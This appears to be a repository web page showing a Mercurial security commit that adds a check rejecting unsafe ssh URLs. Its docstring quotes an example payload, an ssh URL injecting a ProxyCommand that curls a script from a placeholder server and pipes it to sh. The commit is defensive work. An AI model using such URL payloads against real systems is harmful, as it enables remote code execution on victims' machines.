upstream/mercurial-mirror Commit - r33723:0b3fe391

util: add utility method to check for bad ssh urls (SEC)...

Sean Farley -

r33723:0b3fe391 stable

parent child

mercurial/util.py

0 +15 0

              def urllocalpath(path):
                  return url(path, parsequery=False, parsefragment=False).localpath()
+             def checksafessh(path):
+                 """check if a path / url is a potentially unsafe ssh exploit (SEC)
+                 This is a sanity check for ssh urls. ssh will parse the first item as
+                 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
+                 Let's prevent these potentially exploited urls entirely and warn the
+                 user.
+                 Raises an error.Abort when the url is unsafe.
+                 """
+                 path = urlreq.unquote(path)
+                 if path.startswith('ssh://-') or '|' in path:
+                     raise error.Abort(_('potentially unsafe url: %r') %
+                                       (path,))
              def hidepassword(u):
                  '''hide user credential in a url string'''
                  u = url(u)

General Comments 0

You need to be logged in to leave comments. Login now

No TODOs yet

	Repositories
g s	Goto summary page
g c	Goto changelog page
g f	Goto files page
g F	Goto files page with file search activated
g p	Goto pull requests page
g o	Goto repository settings
g O	Goto repository access permissions settings
t s	Toggle sidebar on some pages